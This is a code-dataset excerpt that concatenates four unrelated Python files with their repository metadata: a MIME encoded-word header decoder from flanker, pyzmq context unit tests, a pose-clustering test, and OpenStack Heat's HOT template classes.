2022-02-25T00:58:40.000Z
|
dashboard/lib/flanker/mime/message/headers/encodedword.py
|
robertsimmons514/isthislegit
|
aa8f2b6cb2ac3de2b0fe03bb93dbceccc4c1f495
|
[
"BSD-3-Clause"
] | 46
|
2017-07-26T22:54:13.000Z
|
2022-02-14T21:39:52.000Z
|
dashboard/lib/flanker/mime/message/headers/encodedword.py
|
robertsimmons514/isthislegit
|
aa8f2b6cb2ac3de2b0fe03bb93dbceccc4c1f495
|
[
"BSD-3-Clause"
] | 53
|
2017-07-22T15:04:16.000Z
|
2022-03-16T03:36:28.000Z
|
# coding:utf-8
import logging
import re
import email.quoprimime
import email.base64mime
from base64 import b64encode
from flanker.mime.message import charsets, errors
log = logging.getLogger(__name__)
#deal with unfolding
foldingWhiteSpace = re.compile(r"(\n\r?|\r\n?)(\s*)")
def unfold(value):
"""
Unfolding is accomplished by simply removing any CRLF
that is immediately followed by WSP. Each header field should be
treated in its unfolded form for further syntactic and semantic
evaluation.
"""
return re.sub(foldingWhiteSpace, r"\2", value)
def decode(header):
return mime_to_unicode(header)
def mime_to_unicode(header):
"""
Takes a header value and returns a fully decoded unicode string.
It differs from standard Python's mail.header.decode_header() because:
- it is higher level, i.e. returns a unicode string instead of
an array of tuples
- it accepts Unicode and non-ASCII strings as well
>>> header_to_unicode("=?UTF-8?B?UmVbMl06INCX0LXQvNC70Y/QutC4?=")
u"Земляки"
>>> header_to_unicode("hello")
u"Hello"
"""
# Only string header values need to be converted.
if not isinstance(header, basestring):
return header
try:
header = unfold(header)
decoded = [] # decoded parts
while header:
match = encodedWord.search(header)
if match:
start = match.start()
if start != 0:
# decodes unencoded ascii part to unicode
value = charsets.convert_to_unicode(ascii, header[0:start])
if value.strip():
decoded.append(value)
# decode a header =?...?= of encoding
charset, value = decode_part(
match.group('charset').lower(),
match.group('encoding').lower(),
match.group('encoded'))
decoded.append(charsets.convert_to_unicode(charset, value))
header = header[match.end():]
else:
# no match? append the remainder
# of the string to the list of chunks
decoded.append(charsets.convert_to_unicode(ascii, header))
break
return u"".join(decoded)
except Exception:
try:
logged_header = header
if isinstance(logged_header, unicode):
logged_header = logged_header.encode('utf-8')
# encode header as utf-8 so all characters can be base64 encoded
logged_header = b64encode(logged_header)
log.warning(
u"HEADER-DECODE-FAIL: ({0}) - b64encoded".format(
logged_header))
except Exception:
log.exception("Failed to log exception")
return header
ascii = 'ascii'
#this spec refers to
#http://tools.ietf.org/html/rfc2047
encodedWord = re.compile(r'''(?P<encodedWord>
=\? # literal =?
(?P<charset>[^?]*?) # non-greedy up to the next ? is the charset
\? # literal ?
(?P<encoding>[qb]) # either a "q" or a "b", case insensitive
\? # literal ?
(?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string
\?= # literal ?=
)''', re.VERBOSE | re.IGNORECASE | re.MULTILINE)
def decode_part(charset, encoding, value):
"""
Attempts to decode part, understands
'q' - quoted encoding
'b' - base64 mime encoding
Returns (charset, decoded-string)
"""
if encoding == 'q':
return (charset, email.quoprimime.header_decode(str(value)))
elif encoding == 'b':
# Postel's law: add missing padding
paderr = len(value) % 4
if paderr:
value += '==='[:4 - paderr]
return (charset, email.base64mime.decode(value))
elif not encoding:
return (charset, value)
else:
raise errors.DecodingError(
"Unknown encoding: {0}".format(encoding))
| 31.565891
| 80
| 0.582515
|
39658c25a232a30323084d4bd61021d193079d44
| 10,172
|
py
|
Python
|
ServidorPython/python32_web/Lib/site-packages/zmq/tests/test_context.py
|
mak213k/Servidor_automatizado_python
|
4403ef8027a2f814220baacc95856cf5fbf01d21
|
[
"MIT"
] | 130
|
2018-02-03T10:25:54.000Z
|
2022-03-25T22:27:22.000Z
|
ServidorPython/python32_web/Lib/site-packages/zmq/tests/test_context.py
|
mak213k/Servidor_automatizado_python
|
4403ef8027a2f814220baacc95856cf5fbf01d21
|
[
"MIT"
] | 12
|
2018-12-06T22:06:49.000Z
|
2022-02-25T17:40:44.000Z
|
ServidorPython/python32_web/Lib/site-packages/zmq/tests/test_context.py
|
mak213k/Servidor_automatizado_python
|
4403ef8027a2f814220baacc95856cf5fbf01d21
|
[
"MIT"
] | 64
|
2018-04-25T08:51:57.000Z
|
2022-01-29T14:13:57.000Z
|
# Copyright (C) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
import copy
import gc
import sys
import time
from threading import Thread, Event
try:
from queue import Queue
except ImportError:
from Queue import Queue
from pytest import mark
import zmq
from zmq.tests import (
BaseZMQTestCase, have_gevent, GreenTest, skip_green, PYPY, SkipTest,
)
class KwargTestSocket(zmq.Socket):
test_kwarg_value = None
def __init__(self, *args, **kwargs):
self.test_kwarg_value = kwargs.pop('test_kwarg', None)
super(KwargTestSocket, self).__init__(*args, **kwargs)
class KwargTestContext(zmq.Context):
_socket_class = KwargTestSocket
class TestContext(BaseZMQTestCase):
def test_init(self):
c1 = self.Context()
self.assert_(isinstance(c1, self.Context))
del c1
c2 = self.Context()
self.assert_(isinstance(c2, self.Context))
del c2
c3 = self.Context()
self.assert_(isinstance(c3, self.Context))
del c3
def test_dir(self):
ctx = self.Context()
self.assertTrue('socket' in dir(ctx))
if zmq.zmq_version_info() > (3,):
self.assertTrue('IO_THREADS' in dir(ctx))
ctx.term()
def test_term(self):
c = self.Context()
c.term()
self.assert_(c.closed)
def test_context_manager(self):
with self.Context() as c:
pass
self.assert_(c.closed)
def test_fail_init(self):
self.assertRaisesErrno(zmq.EINVAL, self.Context, -1)
def test_term_hang(self):
rep,req = self.create_bound_pair(zmq.ROUTER, zmq.DEALER)
req.setsockopt(zmq.LINGER, 0)
req.send(b'hello', copy=False)
req.close()
rep.close()
self.context.term()
def test_instance(self):
ctx = self.Context.instance()
c2 = self.Context.instance(io_threads=2)
self.assertTrue(c2 is ctx)
c2.term()
c3 = self.Context.instance()
c4 = self.Context.instance()
self.assertFalse(c3 is c2)
self.assertFalse(c3.closed)
self.assertTrue(c3 is c4)
def test_instance_threadsafe(self):
self.context.term() # clear default context
q = Queue()
# slow context initialization,
# to ensure that we are both trying to create one at the same time
class SlowContext(self.Context):
def __init__(self, *a, **kw):
time.sleep(1)
super(SlowContext, self).__init__(*a, **kw)
def f():
q.put(SlowContext.instance())
# call ctx.instance() in several threads at once
N = 16
threads = [ Thread(target=f) for i in range(N) ]
[ t.start() for t in threads ]
# also call it in the main thread (not first)
ctx = SlowContext.instance()
assert isinstance(ctx, SlowContext)
# check that all the threads got the same context
for i in range(N):
thread_ctx = q.get(timeout=5)
assert thread_ctx is ctx
# cleanup
ctx.term()
[ t.join(timeout=5) for t in threads ]
def test_socket_passes_kwargs(self):
test_kwarg_value = 'testing one two three'
with KwargTestContext() as ctx:
with ctx.socket(zmq.DEALER, test_kwarg=test_kwarg_value) as socket:
self.assertTrue(socket.test_kwarg_value is test_kwarg_value)
def test_many_sockets(self):
"""opening and closing many sockets shouldn't cause problems"""
ctx = self.Context()
for i in range(16):
sockets = [ ctx.socket(zmq.REP) for i in range(65) ]
[ s.close() for s in sockets ]
# give the reaper a chance
time.sleep(1e-2)
ctx.term()
def test_sockopts(self):
"""setting socket options with ctx attributes"""
ctx = self.Context()
ctx.linger = 5
self.assertEqual(ctx.linger, 5)
s = ctx.socket(zmq.REQ)
self.assertEqual(s.linger, 5)
self.assertEqual(s.getsockopt(zmq.LINGER), 5)
s.close()
# check that subscribe doesn't get set on sockets that don't subscribe:
ctx.subscribe = b''
s = ctx.socket(zmq.REQ)
s.close()
ctx.term()
@mark.skipif(
sys.platform.startswith('win'),
reason='Segfaults on Windows')
def test_destroy(self):
"""Context.destroy should close sockets"""
ctx = self.Context()
sockets = [ ctx.socket(zmq.REP) for i in range(65) ]
# close half of the sockets
[ s.close() for s in sockets[::2] ]
ctx.destroy()
# reaper is not instantaneous
time.sleep(1e-2)
for s in sockets:
self.assertTrue(s.closed)
def test_destroy_linger(self):
"""Context.destroy should set linger on closing sockets"""
req,rep = self.create_bound_pair(zmq.REQ, zmq.REP)
req.send(b'hi')
time.sleep(1e-2)
self.context.destroy(linger=0)
# reaper is not instantaneous
time.sleep(1e-2)
for s in (req,rep):
self.assertTrue(s.closed)
def test_term_noclose(self):
"""Context.term won't close sockets"""
ctx = self.Context()
s = ctx.socket(zmq.REQ)
self.assertFalse(s.closed)
t = Thread(target=ctx.term)
t.start()
t.join(timeout=0.1)
self.assertTrue(t.is_alive(), "Context should be waiting")
s.close()
t.join(timeout=0.1)
self.assertFalse(t.is_alive(), "Context should have closed")
def test_gc(self):
"""test close&term by garbage collection alone"""
if PYPY:
raise SkipTest("GC doesn't work ")
# test credit @dln (GH #137):
def gcf():
def inner():
ctx = self.Context()
s = ctx.socket(zmq.PUSH)
inner()
gc.collect()
t = Thread(target=gcf)
t.start()
t.join(timeout=1)
self.assertFalse(t.is_alive(), "Garbage collection should have cleaned up context")
def test_cyclic_destroy(self):
"""ctx.destroy should succeed when cyclic ref prevents gc"""
# test credit @dln (GH #137):
class CyclicReference(object):
def __init__(self, parent=None):
self.parent = parent
def crash(self, sock):
self.sock = sock
self.child = CyclicReference(self)
def crash_zmq():
ctx = self.Context()
sock = ctx.socket(zmq.PULL)
c = CyclicReference()
c.crash(sock)
ctx.destroy()
crash_zmq()
def test_term_thread(self):
"""ctx.term should not crash active threads (#139)"""
ctx = self.Context()
evt = Event()
evt.clear()
def block():
s = ctx.socket(zmq.REP)
s.bind_to_random_port('tcp://127.0.0.1')
evt.set()
try:
s.recv()
except zmq.ZMQError as e:
self.assertEqual(e.errno, zmq.ETERM)
return
finally:
s.close()
self.fail("recv should have been interrupted with ETERM")
t = Thread(target=block)
t.start()
evt.wait(1)
self.assertTrue(evt.is_set(), "sync event never fired")
time.sleep(0.01)
ctx.term()
t.join(timeout=1)
self.assertFalse(t.is_alive(), "term should have interrupted s.recv()")
def test_destroy_no_sockets(self):
ctx = self.Context()
s = ctx.socket(zmq.PUB)
s.bind_to_random_port('tcp://127.0.0.1')
s.close()
ctx.destroy()
assert s.closed
assert ctx.closed
def test_ctx_opts(self):
if zmq.zmq_version_info() < (3,):
raise SkipTest("context options require libzmq 3")
ctx = self.Context()
ctx.set(zmq.MAX_SOCKETS, 2)
self.assertEqual(ctx.get(zmq.MAX_SOCKETS), 2)
ctx.max_sockets = 100
self.assertEqual(ctx.max_sockets, 100)
self.assertEqual(ctx.get(zmq.MAX_SOCKETS), 100)
def test_copy(self):
c1 = self.Context()
c2 = copy.copy(c1)
c2b = copy.deepcopy(c1)
c3 = copy.deepcopy(c2)
self.assert_(c2._shadow)
self.assert_(c3._shadow)
self.assertEqual(c1.underlying, c2.underlying)
self.assertEqual(c1.underlying, c3.underlying)
self.assertEqual(c1.underlying, c2b.underlying)
s = c3.socket(zmq.PUB)
s.close()
c1.term()
def test_shadow(self):
ctx = self.Context()
ctx2 = self.Context.shadow(ctx.underlying)
self.assertEqual(ctx.underlying, ctx2.underlying)
s = ctx.socket(zmq.PUB)
s.close()
del ctx2
self.assertFalse(ctx.closed)
s = ctx.socket(zmq.PUB)
ctx2 = self.Context.shadow(ctx.underlying)
s2 = ctx2.socket(zmq.PUB)
s.close()
s2.close()
ctx.term()
self.assertRaisesErrno(zmq.EFAULT, ctx2.socket, zmq.PUB)
del ctx2
def test_shadow_pyczmq(self):
try:
from pyczmq import zctx, zsocket, zstr
except Exception:
raise SkipTest("Requires pyczmq")
ctx = zctx.new()
a = zsocket.new(ctx, zmq.PUSH)
zsocket.bind(a, "inproc://a")
ctx2 = self.Context.shadow_pyczmq(ctx)
b = ctx2.socket(zmq.PULL)
b.connect("inproc://a")
zstr.send(a, b'hi')
rcvd = self.recv(b)
self.assertEqual(rcvd, b'hi')
b.close()
if False: # disable green context tests
class TestContextGreen(GreenTest, TestContext):
"""gevent subclass of context tests"""
# skip tests that use real threads:
test_gc = GreenTest.skip_green
test_term_thread = GreenTest.skip_green
test_destroy_linger = GreenTest.skip_green
| 31.012195
| 91
| 0.570783
|
fe33dd6cb214fd6fd419552d34bfe244e68037cb
| 2,409
|
py
|
Python
|
project/tests/test_pairwise_relations.py
|
qxcv/comp2560
|
930adfffe95313ad0e43ca782b1ad8140948ff33
|
[
"Apache-2.0"
] | 6
|
2016-02-29T12:55:56.000Z
|
2020-03-18T14:37:59.000Z
|
project/tests/test_pairwise_relations.py
|
qxcv/comp2560
|
930adfffe95313ad0e43ca782b1ad8140948ff33
|
[
"Apache-2.0"
] | 1
|
2017-06-06T19:34:21.000Z
|
2017-07-21T02:01:48.000Z
|
project/tests/test_pairwise_relations.py
|
qxcv/comp2560
|
930adfffe95313ad0e43ca782b1ad8140948ff33
|
[
"Apache-2.0"
] | 4
|
2016-08-11T00:41:42.000Z
|
2020-06-23T09:32:02.000Z
|
import numpy as np
from datasets import Joints
from pairwise_relations import from_dataset
def generate_fake_locations(num, means, stddev=5):
"""Generate a matrix with four rows (one for each "point") and three
columns (x-coord, y-coord and visibility). Means is a 3x2 matrix giving
mean locations for each point."""
per_joint = []
for joint_mean in means:
locations = np.random.multivariate_normal(
joint_mean, stddev * np.eye(2), num
)
with_visibility = np.append(locations, np.ones((num, 1)), axis=1)
per_joint.append(with_visibility)
warped_array = np.array(per_joint)
# Now we need to swap the first and second dimensions
return warped_array.transpose((1, 0, 2))
def test_clustering():
"""Test learning of clusters for joint types."""
first_means = np.asarray([
(10, 70),
(58, 94),
(66, 58),
(95, 62)
])
second_means = np.asarray([
(88, 12),
(56, 15),
(25, 21),
(24, 89)
])
fake_locations = np.concatenate([
generate_fake_locations(100, first_means),
generate_fake_locations(100, second_means),
], axis=0)
np.random.shuffle(fake_locations)
fake_pairs = [
(0, 1),
(1, 2),
(2, 3)
]
fake_joints = Joints(fake_locations, fake_pairs)
# Make two clusters for each relationship type. Yes, passing in zeros as
# your scale is stupid, and poor testing practice.
centers = from_dataset(fake_joints, 2, np.zeros(len(fake_locations)), 1)
assert centers.ndim == 3
# Three joints, two clusters per joint, two coordinates (i.e. x, y) per
# cluster
assert centers.shape == (3, 2, 2)
for idx, pair in enumerate(fake_pairs):
first_idx, second_idx = pair
first_mean = first_means[second_idx] - first_means[first_idx]
second_mean = second_means[second_idx] - second_means[first_idx]
found_means = centers[idx]
first_dists = np.linalg.norm(found_means - first_mean, axis=1)
second_dists = np.linalg.norm(found_means - second_mean, axis=1)
# Make sure that each of our specified means are within Euclidean
# distance 1 of at least one found cluster
first_within = first_dists < 1
assert first_within.any()
second_within = second_dists < 1
assert second_within.any()
| 33.929577
| 76
| 0.64093
|
b6e3d9dc58ff1d4dcfaf20418b522b7d3778c95f
| 18,694
|
py
|
Python
|
heat/engine/hot/template.py
|
p0i0/openstack-heat
|
414d5b11c0f454d1aac6c26eeff8f89e731dc0f3
|
[
"Apache-2.0"
] | null | null | null |
heat/engine/hot/template.py
|
p0i0/openstack-heat
|
414d5b11c0f454d1aac6c26eeff8f89e731dc0f3
|
[
"Apache-2.0"
] | null | null | null |
heat/engine/hot/template.py
|
p0i0/openstack-heat
|
414d5b11c0f454d1aac6c26eeff8f89e731dc0f3
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from heat.common import exception
from heat.common.i18n import _
from heat.engine.cfn import functions as cfn_funcs
from heat.engine.cfn import template as cfn_template
from heat.engine import function
from heat.engine.hot import functions as hot_funcs
from heat.engine.hot import parameters
from heat.engine import rsrc_defn
from heat.engine import template_common
class HOTemplate20130523(template_common.CommonTemplate):
"""A Heat Orchestration Template format stack template."""
SECTIONS = (
VERSION, DESCRIPTION, PARAMETER_GROUPS,
PARAMETERS, RESOURCES, OUTPUTS, MAPPINGS,
) = (
'heat_template_version', 'description', 'parameter_groups',
'parameters', 'resources', 'outputs', '__undefined__',
)
OUTPUT_KEYS = (
OUTPUT_DESCRIPTION, OUTPUT_VALUE,
) = (
'description', 'value',
)
SECTIONS_NO_DIRECT_ACCESS = set([PARAMETERS, VERSION])
_CFN_TO_HOT_SECTIONS = {cfn_template.CfnTemplate.VERSION: VERSION,
cfn_template.CfnTemplate.DESCRIPTION: DESCRIPTION,
cfn_template.CfnTemplate.PARAMETERS: PARAMETERS,
cfn_template.CfnTemplate.MAPPINGS: MAPPINGS,
cfn_template.CfnTemplate.RESOURCES: RESOURCES,
cfn_template.CfnTemplate.OUTPUTS: OUTPUTS}
_RESOURCE_KEYS = (
RES_TYPE, RES_PROPERTIES, RES_METADATA, RES_DEPENDS_ON,
RES_DELETION_POLICY, RES_UPDATE_POLICY, RES_DESCRIPTION,
) = (
'type', 'properties', 'metadata', 'depends_on',
'deletion_policy', 'update_policy', 'description',
)
_RESOURCE_HOT_TO_CFN_ATTRS = {
RES_TYPE: cfn_template.CfnTemplate.RES_TYPE,
RES_PROPERTIES: cfn_template.CfnTemplate.RES_PROPERTIES,
RES_METADATA: cfn_template.CfnTemplate.RES_METADATA,
RES_DEPENDS_ON: cfn_template.CfnTemplate.RES_DEPENDS_ON,
RES_DELETION_POLICY: cfn_template.CfnTemplate.RES_DELETION_POLICY,
RES_UPDATE_POLICY: cfn_template.CfnTemplate.RES_UPDATE_POLICY,
RES_DESCRIPTION: cfn_template.CfnTemplate.RES_DESCRIPTION}
_HOT_TO_CFN_ATTRS = _RESOURCE_HOT_TO_CFN_ATTRS
_HOT_TO_CFN_ATTRS.update(
{OUTPUT_VALUE: cfn_template.CfnTemplate.OUTPUT_VALUE})
extra_rsrc_defn = ()
functions = {
'Fn::GetAZs': cfn_funcs.GetAZs,
'get_param': hot_funcs.GetParam,
'get_resource': cfn_funcs.ResourceRef,
'Ref': cfn_funcs.Ref,
'get_attr': hot_funcs.GetAttThenSelect,
'Fn::Select': cfn_funcs.Select,
'Fn::Join': cfn_funcs.Join,
'list_join': hot_funcs.Join,
'Fn::Split': cfn_funcs.Split,
'str_replace': hot_funcs.Replace,
'Fn::Replace': cfn_funcs.Replace,
'Fn::Base64': cfn_funcs.Base64,
'Fn::MemberListToMap': cfn_funcs.MemberListToMap,
'resource_facade': hot_funcs.ResourceFacade,
'Fn::ResourceFacade': cfn_funcs.ResourceFacade,
'get_file': hot_funcs.GetFile,
}
deletion_policies = {
'Delete': rsrc_defn.ResourceDefinition.DELETE,
'Retain': rsrc_defn.ResourceDefinition.RETAIN,
'Snapshot': rsrc_defn.ResourceDefinition.SNAPSHOT
}
def __getitem__(self, section):
""""Get the relevant section in the template."""
# first translate from CFN into HOT terminology if necessary
if section not in self.SECTIONS:
section = HOTemplate20130523._translate(
section, self._CFN_TO_HOT_SECTIONS,
_('"%s" is not a valid template section'))
if section not in self.SECTIONS:
raise KeyError(_('"%s" is not a valid template section') % section)
if section in self.SECTIONS_NO_DIRECT_ACCESS:
raise KeyError(
_('Section %s can not be accessed directly.') % section)
if section == self.MAPPINGS:
return {}
if section == self.DESCRIPTION:
default = 'No description'
else:
default = {}
# if a section is None (empty yaml section) return {}
# to be consistent with an empty json section.
the_section = self.t.get(section) or default
# In some cases (e.g. parameters), also translate each entry of
# a section into CFN format (case, naming, etc) so the rest of the
# engine can cope with it.
# This is a shortcut for now and might be changed in the future.
if section == self.RESOURCES:
return self._translate_resources(the_section)
if section == self.OUTPUTS:
self.validate_section(self.OUTPUTS, self.OUTPUT_VALUE,
the_section, self.OUTPUT_KEYS)
return the_section
@staticmethod
def _translate(value, mapping, err_msg=None):
try:
return mapping[value]
except KeyError as ke:
if err_msg:
raise KeyError(err_msg % value)
else:
raise ke
def validate_section(self, section, sub_section, data, allowed_keys):
obj_name = section[:-1]
err_msg = _('"%%s" is not a valid keyword inside a %s '
'definition') % obj_name
args = {'object_name': obj_name, 'sub_section': sub_section}
message = _('Each %(object_name)s must contain a '
'%(sub_section)s key.') % args
for name, attrs in sorted(data.items()):
if not attrs:
raise exception.StackValidationFailed(message=message)
try:
for attr, attr_value in six.iteritems(attrs):
if attr not in allowed_keys:
raise KeyError(err_msg % attr)
if sub_section not in attrs:
raise exception.StackValidationFailed(message=message)
except AttributeError:
message = _('"%(section)s" must contain a map of '
'%(obj_name)s maps. Found a [%(_type)s] '
'instead') % {'section': section,
'_type': type(attrs),
'obj_name': obj_name}
raise exception.StackValidationFailed(message=message)
except KeyError as e:
# an invalid keyword was found
raise exception.StackValidationFailed(message=e.args[0])
def _translate_section(self, section, sub_section, data, mapping):
self.validate_section(section, sub_section, data, mapping)
cfn_objects = {}
for name, attrs in sorted(data.items()):
cfn_object = {}
for attr, attr_value in six.iteritems(attrs):
cfn_attr = mapping[attr]
if cfn_attr is not None:
cfn_object[cfn_attr] = attr_value
cfn_objects[name] = cfn_object
return cfn_objects
def _translate_resources(self, resources):
"""Get the resources of the template translated into CFN format."""
return self._translate_section(self.RESOURCES, self.RES_TYPE,
resources,
self._RESOURCE_HOT_TO_CFN_ATTRS)
def get_section_name(self, section):
cfn_to_hot_attrs = dict(
zip(six.itervalues(self._HOT_TO_CFN_ATTRS),
six.iterkeys(self._HOT_TO_CFN_ATTRS)))
return cfn_to_hot_attrs.get(section, section)
def param_schemata(self, param_defaults=None):
parameter_section = self.t.get(self.PARAMETERS) or {}
pdefaults = param_defaults or {}
for name, schema in six.iteritems(parameter_section):
if name in pdefaults:
parameter_section[name]['default'] = pdefaults[name]
params = six.iteritems(parameter_section)
return dict((name, parameters.HOTParamSchema.from_dict(name, schema))
for name, schema in params)
def parameters(self, stack_identifier, user_params, param_defaults=None):
return parameters.HOTParameters(stack_identifier, self,
user_params=user_params,
param_defaults=param_defaults)
def resource_definitions(self, stack):
resources = self.t.get(self.RESOURCES) or {}
def rsrc_defn_from_snippet(name, snippet):
data = self.parse(stack, snippet)
return self.rsrc_defn_from_snippet(name, data)
return dict(
(name, rsrc_defn_from_snippet(name, data))
for name, data in resources.items() if self.get_res_condition(
stack, data, name))
@classmethod
def rsrc_defn_from_snippet(cls, name, data):
depends = data.get(cls.RES_DEPENDS_ON)
if isinstance(depends, six.string_types):
depends = [depends]
deletion_policy = function.resolve(
data.get(cls.RES_DELETION_POLICY))
if deletion_policy is not None:
if deletion_policy not in cls.deletion_policies:
msg = _('Invalid deletion policy "%s"') % deletion_policy
raise exception.StackValidationFailed(message=msg)
else:
deletion_policy = cls.deletion_policies[deletion_policy]
kwargs = {
'resource_type': data.get(cls.RES_TYPE),
'properties': data.get(cls.RES_PROPERTIES),
'metadata': data.get(cls.RES_METADATA),
'depends': depends,
'deletion_policy': deletion_policy,
'update_policy': data.get(cls.RES_UPDATE_POLICY),
'description': None
}
for key in cls.extra_rsrc_defn:
kwargs[key] = data.get(key)
return rsrc_defn.ResourceDefinition(name, **kwargs)
def add_resource(self, definition, name=None):
if name is None:
name = definition.name
if self.t.get(self.RESOURCES) is None:
self.t[self.RESOURCES] = {}
self.t[self.RESOURCES][name] = definition.render_hot()
class HOTemplate20141016(HOTemplate20130523):
functions = {
'get_attr': hot_funcs.GetAtt,
'get_file': hot_funcs.GetFile,
'get_param': hot_funcs.GetParam,
'get_resource': cfn_funcs.ResourceRef,
'list_join': hot_funcs.Join,
'resource_facade': hot_funcs.ResourceFacade,
'str_replace': hot_funcs.Replace,
'Fn::Select': cfn_funcs.Select,
# functions removed from 2014-10-16
'Fn::GetAZs': hot_funcs.Removed,
'Fn::Join': hot_funcs.Removed,
'Fn::Split': hot_funcs.Removed,
'Fn::Replace': hot_funcs.Removed,
'Fn::Base64': hot_funcs.Removed,
'Fn::MemberListToMap': hot_funcs.Removed,
'Fn::ResourceFacade': hot_funcs.Removed,
'Ref': hot_funcs.Removed,
}
class HOTemplate20150430(HOTemplate20141016):
functions = {
'get_attr': hot_funcs.GetAtt,
'get_file': hot_funcs.GetFile,
'get_param': hot_funcs.GetParam,
'get_resource': cfn_funcs.ResourceRef,
'list_join': hot_funcs.Join,
'repeat': hot_funcs.Repeat,
'resource_facade': hot_funcs.ResourceFacade,
'str_replace': hot_funcs.Replace,
'Fn::Select': cfn_funcs.Select,
# functions added in 2015-04-30
'digest': hot_funcs.Digest,
# functions removed from 2014-10-16
'Fn::GetAZs': hot_funcs.Removed,
'Fn::Join': hot_funcs.Removed,
'Fn::Split': hot_funcs.Removed,
'Fn::Replace': hot_funcs.Removed,
'Fn::Base64': hot_funcs.Removed,
'Fn::MemberListToMap': hot_funcs.Removed,
'Fn::ResourceFacade': hot_funcs.Removed,
'Ref': hot_funcs.Removed,
}
class HOTemplate20151015(HOTemplate20150430):
functions = {
'get_attr': hot_funcs.GetAttAllAttributes,
'get_file': hot_funcs.GetFile,
'get_param': hot_funcs.GetParam,
'get_resource': cfn_funcs.ResourceRef,
'list_join': hot_funcs.JoinMultiple,
'repeat': hot_funcs.Repeat,
'resource_facade': hot_funcs.ResourceFacade,
'str_replace': hot_funcs.ReplaceJson,
# functions added in 2015-04-30
'digest': hot_funcs.Digest,
# functions added in 2015-10-15
'str_split': hot_funcs.StrSplit,
# functions removed from 2015-10-15
'Fn::Select': hot_funcs.Removed,
# functions removed from 2014-10-16
'Fn::GetAZs': hot_funcs.Removed,
'Fn::Join': hot_funcs.Removed,
'Fn::Split': hot_funcs.Removed,
'Fn::Replace': hot_funcs.Removed,
'Fn::Base64': hot_funcs.Removed,
'Fn::MemberListToMap': hot_funcs.Removed,
'Fn::ResourceFacade': hot_funcs.Removed,
'Ref': hot_funcs.Removed,
}
class HOTemplate20160408(HOTemplate20151015):
functions = {
'get_attr': hot_funcs.GetAttAllAttributes,
'get_file': hot_funcs.GetFile,
'get_param': hot_funcs.GetParam,
'get_resource': cfn_funcs.ResourceRef,
'list_join': hot_funcs.JoinMultiple,
'repeat': hot_funcs.Repeat,
'resource_facade': hot_funcs.ResourceFacade,
'str_replace': hot_funcs.ReplaceJson,
# functions added in 2015-04-30
'digest': hot_funcs.Digest,
# functions added in 2015-10-15
'str_split': hot_funcs.StrSplit,
# functions added in 2016-04-08
'map_merge': hot_funcs.MapMerge,
# functions removed from 2015-10-15
'Fn::Select': hot_funcs.Removed,
# functions removed from 2014-10-16
'Fn::GetAZs': hot_funcs.Removed,
'Fn::Join': hot_funcs.Removed,
'Fn::Split': hot_funcs.Removed,
'Fn::Replace': hot_funcs.Removed,
'Fn::Base64': hot_funcs.Removed,
'Fn::MemberListToMap': hot_funcs.Removed,
'Fn::ResourceFacade': hot_funcs.Removed,
'Ref': hot_funcs.Removed,
}
class HOTemplate20161014(HOTemplate20160408):
CONDITION = 'condition'
RES_CONDITION = CONDITION
CONDITIONS = 'conditions'
SECTIONS = HOTemplate20160408.SECTIONS + (CONDITIONS,)
_CFN_TO_HOT_SECTIONS = HOTemplate20160408._CFN_TO_HOT_SECTIONS
_CFN_TO_HOT_SECTIONS.update({
cfn_template.CfnTemplate.CONDITIONS: CONDITIONS})
_RESOURCE_KEYS = HOTemplate20160408._RESOURCE_KEYS
_EXT_KEY = (RES_EXTERNAL_ID,) = ('external_id',)
_RESOURCE_KEYS += _EXT_KEY
_RESOURCE_KEYS += (RES_CONDITION,)
_RESOURCE_HOT_TO_CFN_ATTRS = HOTemplate20160408._RESOURCE_HOT_TO_CFN_ATTRS
_RESOURCE_HOT_TO_CFN_ATTRS.update({RES_EXTERNAL_ID: None})
_RESOURCE_HOT_TO_CFN_ATTRS.update(
{CONDITION: cfn_template.CfnTemplate.CONDITION})
extra_rsrc_defn = HOTemplate20160408.extra_rsrc_defn + (
RES_EXTERNAL_ID, RES_CONDITION,)
OUTPUT_CONDITION = CONDITION
OUTPUT_KEYS = HOTemplate20160408.OUTPUT_KEYS + (OUTPUT_CONDITION,)
deletion_policies = {
'Delete': rsrc_defn.ResourceDefinition.DELETE,
'Retain': rsrc_defn.ResourceDefinition.RETAIN,
'Snapshot': rsrc_defn.ResourceDefinition.SNAPSHOT,
# aliases added in 2016-10-14
'delete': rsrc_defn.ResourceDefinition.DELETE,
'retain': rsrc_defn.ResourceDefinition.RETAIN,
'snapshot': rsrc_defn.ResourceDefinition.SNAPSHOT,
}
functions = {
'get_attr': hot_funcs.GetAttAllAttributes,
'get_file': hot_funcs.GetFile,
'get_param': hot_funcs.GetParam,
'get_resource': cfn_funcs.ResourceRef,
'list_join': hot_funcs.JoinMultiple,
'repeat': hot_funcs.RepeatWithMap,
'resource_facade': hot_funcs.ResourceFacade,
'str_replace': hot_funcs.ReplaceJson,
# functions added in 2015-04-30
'digest': hot_funcs.Digest,
# functions added in 2015-10-15
'str_split': hot_funcs.StrSplit,
# functions added in 2016-04-08
'map_merge': hot_funcs.MapMerge,
# functions added in 2016-10-14
'yaql': hot_funcs.Yaql,
'map_replace': hot_funcs.MapReplace,
'if': hot_funcs.If,
# functions removed from 2015-10-15
'Fn::Select': hot_funcs.Removed,
# functions removed from 2014-10-16
'Fn::GetAZs': hot_funcs.Removed,
'Fn::Join': hot_funcs.Removed,
'Fn::Split': hot_funcs.Removed,
'Fn::Replace': hot_funcs.Removed,
'Fn::Base64': hot_funcs.Removed,
'Fn::MemberListToMap': hot_funcs.Removed,
'Fn::ResourceFacade': hot_funcs.Removed,
'Ref': hot_funcs.Removed,
}
condition_functions = {
'get_param': hot_funcs.GetParam,
'equals': hot_funcs.Equals,
}
def __init__(self, tmpl, template_id=None, files=None, env=None):
super(HOTemplate20161014, self).__init__(
tmpl, template_id, files, env)
self._parser_condition_functions = {}
for n, f in six.iteritems(self.functions):
if not isinstance(f, hot_funcs.Removed):
self._parser_condition_functions[n] = function.Invalid
else:
self._parser_condition_functions[n] = f
self._parser_condition_functions.update(self.condition_functions)
